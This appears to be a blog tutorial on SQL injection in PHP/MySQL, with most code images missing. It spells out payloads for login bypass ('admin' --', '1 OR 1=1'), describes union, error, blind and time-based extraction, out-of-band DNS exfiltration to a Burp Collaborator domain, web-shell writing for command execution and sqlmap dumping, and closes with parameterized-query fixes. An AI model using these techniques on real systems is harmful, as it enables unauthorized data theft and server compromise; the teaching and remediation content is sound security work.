SQL Injection (SQLi) is a type of code injection in which it’s possible to manipulate SQL queries that are realized by an application in a database. A well-known problem that was being discussed at least since 1998 and still affects a lot of applications.
Injection flaws — such as SQL, NoSQL, OS, LDAP, etc. — are first place in OWASP Top Ten 2017, which is the latest version of a document that lists the biggest security risks for web applications.
And as a matter of fact, it is possible to carry out a series of dangerous attacks from a SQL Injection, for example, how to obtain control of reading and writing over a database; and, in some cases, it’s possible to realize a Remote Command Execution (RCE) on the machine, as we’ll see below.
It is important to point out that this problem is not restricted to either a language or a specific database. With that being said, all of the examples to be demonstrated here, use the PHP language and the MySQL database as an option of the author.
Understanding the SQLi
Let’s go to our first example. Take into account the vulnerable code snippet below:
Initially, we can observe that this code has an authentication functionality. It is receiving a credential (username and password), and then, using it to try to retrieve the user’s data from the database. Since the value provided by the user is being used directly in the creation of the SQL query, without executing any kind of treatment, we can notice that this example is vulnerable to a SQL Injection.
To explore the flaw showed on the example 1, an attacker can submit, as the application credentials, the values admin’ — and password123. The symbol ‘ (quotation mark) will cause the string originally containing the username to close; and then the comment signs — (two hyphens followed by a space) will cause the resulting SQL query, which is illustrated below, to not perform a password check, thus allowing the authentication using only the username:
In this case, the code searches for a document belonging to the user that matches the id entered by him.
Taking into account that the query is also constructed from the user’s input, without any kind of treatment, an attacker can submit the value 1 OR 1=1 in the “id field”, resulting in a WHERE that will always have a “true” condition and consequently causing all the documents to be returned. This not only allows the attacker to access other users’ documents; but also, depending on the amount of data stored, it can cause a denial of service (DoS).
SELECT * FROM documents WHERE user_id=42 AND id = 1 OR 1=1
— the query above is equivalent to:
SELECT * FROM documents
It is interesting to point out that SQLi is not limited to SELECT, it can occur in other statements such as INSERT, UPDATE, and DELETE. In addition, analyzing the functionality provided in the application, it is often easy to deduce which instruction was used.
Example 3 is a functionality that creates documents. In this case, if an attacker enters the value opa.doc”,user()); — in the name field, a document with the name opa.doc will be created, which will contain the result of the function user() inside.
So far, we have seen simple ways to exploit a SQL Injection. Next, we will see more advanced strategies that can be used according to the properties of each system.
Union-based
In the SQL language there is the UNION operator, which joins the result of multiple SELECT statements. So, when an injection occurs in a SELECT, it is possible to use this operator in a technique known as Union-based, to create a new query.
However, it should be noted that, in order to use UNION, the second query must show the same number of columns as the original query; in addition, they must have compatible data types. This can be solved by using trial and error, increasing the number of elements in the second query with null values. As you can see below, in an exploitation against the example 2:
In addition, UNION can be used together with other techniques, as shown in Image 12. And it can also create the necessity to know the names of the database tables and columns, which can be solved by reading standard tables containing this information (information_schema.tables in MSSQL and MySQL, all_tables in Oracle).
Stacked Queries
Stacked queries is the name of a functionality that allows multiple SQL operations to be performed at once. Then, in the scenario of exploiting an SQLi flaw, it is possible to use the operator ; (semicolon) to end the original query and then create a new one.
However, this method does not always present the result of the injected query, since the application may have been developed to return only the output of a query. Therefore, it may be interesting to use it together with other techniques, such as Out-Of-Band, which will be discussed later. In addition, stacked queries are only supported by some databases (MSSQL does, while MySQL and Oracle do not).
Error-based
When an application exposes error messages related to the database, the Error-based technique can be used, in order to take advantage of these messages to perform an exploitation.
Consider the vulnerable code below:
When inserting characters that break the query, it is possible to notice the occurrence of error messages from the database in the application’s response.
To perform this type of exploitation, the database is a factor that needs to be considered. In the case of MySQL, we can force an error message in its XML parser, through the extractvalue function that expects an XML in the first parameter; and in the second, an expression that will be used to search for a value in an XML, which means, an XPath.
Since the XPath has a well-defined syntax, it is possible to start it with an unexpected character, such as a period ‘.’, And concatenate it with a valid query, which will have its result displayed in the error message. See the following case:
Blind SQL Injection
When a vulnerable web application doesn’t send in its responses (the result of SQL queries or database error messages) the SQL Injection is categorized as Blind, and therefore, it can be called Blind SQL Injection.
As illustrated below, it is possible to reproduce this scenario by modifying the example 4 a little bit:
In the next few topics, we’ll look at some minor types that exist within the Blind.
Boolean-based
In the example 5, the application searches for documents by name and behaves differently according to their existence. In this case, it is interesting to use the Boolean-based technique, which takes advantage of the difference in responses to evaluate expressions, and thereby extract information.
Then, by inserting a document name that already exists in the application (doc1), followed by an AND operator with an expression to be evaluated, it’s possible to discover character by character from the result of an expression, as presented below:
Time-based
Proceeding to our sixth vulnerable example, this time the application always presents the same answer, regardless of the value submitted by the user. For this to happen, the mysqli_fetch_array and die functions from the previous example have been removed, as shown below:
Therefore, the response of the application does not depend on the SQL query, which makes it necessary to use another source of data for exploitation — the response time — with a technique known as Time-based.
The idea of Time-based is similar to that of the Boolean-based technique; however, it is now necessary to use a function that will execute a sleep (generating a difference in the response time), depending on the result of the evaluated expression.
In MySQL, we have the IF function, which receives an expression to be evaluated in the first argument; and according to its result, the second or third argument is chosen to be presented. Thus, it is possible to perform Time-based exploitation, as shown below:
In the image above, it is possible to notice that when the IF expression is incorrect, the sleep function increases the response time by 2 seconds; when it is not incorrect, the answer is presented in its normal time, so this difference in behavior makes it possible to identify the first character presented by the function user(), ‘r’.
Out-of-Band
Finally, we come to the last example of exploitation, which happens when the vulnerable spot doesn’t even allow the accounting of the SQL query time. Which can be reproduced by modifying the mysqli_query function that was used in example 6, as presented below:
In this example, the functionality is asynchronous, which means that the application does not wait for the end of the query in the database to answer the user. So, it is necessary to try a set of techniques known as Out-of-Band, which in order to obtain the attack data use a different communication channel than the one used to carry out the attack.
A good option is to create a query that, when executed, sends its result to an external server on the internet. And although MySQL did not directly implement a function to perform this type of communication, it does provide file manipulation features, which in Windows use the CreateFile function.
CreateFile is a Windows API that, through the implementation performed by MySQL, allows not only access to the files on the machine itself (in this case the server running MySQL), but also allows access to files on the network. Which means that when MySQL is running on Windows, it is possible to create a query that sends data over the internet. As shown below:
In image 10, through the load_file function, MySQL tries to read a file from the hrcxgmpghhpj6spml8g1nklullrff4.burpcollaborator.net domain using the SMB protocol; however, it first needs to perform a DNS query for that domain. And during this, the value of @@version is sent to a DNS server, as if it were the name of a secondary domain, which can be seen in the following image:
Even if the previous exploitation cannot be performed on Linux distributions, there is still the possibility of manipulating local files, which is not restricted to an operating system. In this scenario, if the machine is running a web server and it is possible to write in a directory on it, the result of a query can be saved to a file and accessed later, as presented below:
An even more interesting option in this case is to use write permission on files to obtain an RCE. For that, you only need to send a code made in a language supported by the web server (in our example, PHP), which will execute, in the target’s operating system, a command sent by the user, in order to present the result: send the payload from a web shell.
At this point, it is possible to think that Out-of-Band techniques are always the best options, at least when talking about Blind SQL Injection. However, that’s not true, since there are many factors that can make them impractical, such as the lack of permission to write into directories. What in MySQL can be caused by a restrictive value (which is already the default of installation) in the variable secure_file_priv; the lack of FILE permission on the database user; or, the lack of write permission for the user who runs the database in the operating system.
So, when it comes to exploiting SQLi “silver bullets” don’t really exist; in their place, there are several techniques, each ideal for a specific place and time.
Sqlmap
Sqlmap is the name of a famous open-source tool written in Python to identify and exploit SQL Injection. It is very interesting for automating attacks; because it allows, for example, to exploit in a simple way a spot that needs the Time-based technique, abstracting all the work necessary to read each character.
So, let’s see a case of sqlmap use applied in example 6, which was previously explored with the Time-based technique:
The — dump and — stop 3 options, respectively, retrieve data from the database tables and limit them to 3 entries.
The -u option (short for — url) defines the target, for more complex cases it can be replaced by -r, followed by the path of a file containing the HTTP request that will be performed.
Also, by default, the sqlmap already tests all the parameters of the URL of a GET, and all of the content of a POST, but it is possible to specify other spots.
Correction
When the goal is to correct SQL Injection, the best solution is known as parameterized queries, also called prepared statements.
Parameterized queries are a way that the application has to previously structure the operations that will be performed in the database. They are not an exclusive resource of a technology, and when used, they need to indicate the place where the user’s input will be inserted — a placeholder. This way, it’s possible to completely correct the SQLi failures, as we can see in the case showed in example 1, which is now corrected:
Additionally, parameterized queries also result in improved performance. That’s because there are several steps in handling an SQL query. Basically, first of all, a check is carried out to verify if it makes sense (syntax and semantics); then it is compiled, generating a language that the machine understands; so that it can be executed.
All of these steps are repeated whenever a standard query occurs. In the case of parameterized queries, the database can store the code that was generated in each operation, and this way go directly to the execution step. Since the compilation is not performed again, all placeholders are processed purely as data using a binary protocol, different from the standard in which the complete query is sent to the database. Therefore, user data cannot change the logic of the query and thus cause SQL injections. However, this also limits the parts of the query that can receive user input. For example, in an application that defines the table used in ORDER BY, directly using the data sent by the user, it would not be possible to use parameterized queries.
To solve this, it is possible to use an “allowlist” that will restrict the data received, accepting only a known and limited number of values, preventing malicious SQL commands from being injected. The code below illustrates this solution, in a functionality that lists users:
The image below shows example 9 in operation:
Finally, it is important to remember that all external data received by third parties is dangerous, and therefore, should never be used in the construction of an SQL query without the proper treatments that have been addressed here.
See you soon!